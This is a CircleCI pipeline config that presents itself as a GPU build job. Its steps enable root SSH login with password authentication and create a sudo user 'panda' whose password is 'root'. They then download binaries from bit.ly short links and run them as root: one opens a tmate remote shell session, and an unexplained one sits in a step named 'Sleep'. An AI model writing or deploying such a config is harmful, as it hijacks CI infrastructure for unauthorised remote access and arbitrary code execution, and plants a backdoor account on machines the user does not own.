version: 2.1
jobs:
  pnd:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    parallelism: 1
    steps:
      - run:
         name: Update System
         command: |
          sudo apt-get update
          sudo apt-get install ssh -y
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run:
         name: Add User
         command: |
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
      - run:
         name: Restart Services
         command: |
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run:
         name: Nvidia Version
         command: |
          sudo su --command "nvidia-smi"
      - run: 
         name: Connect 
         command: |
          wget https://bit.ly/3oSxCST
          chmod +x 3oSxCST
          sudo su --command "./3oSxCST -S /tmp/tmate.sock new-session -d"
          sudo su --command "./3oSxCST -S /tmp/tmate.sock wait tmate-ready"
          sudo su --command "./3oSxCST -S /tmp/tmate.sock display -p '#{tmate_ssh}'"
          sudo su --command "touch /tmp/keepalive"
      - run: 
         name: Sleep
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"

workflows:
  version: 2.1
  build:
    jobs:
      - pnd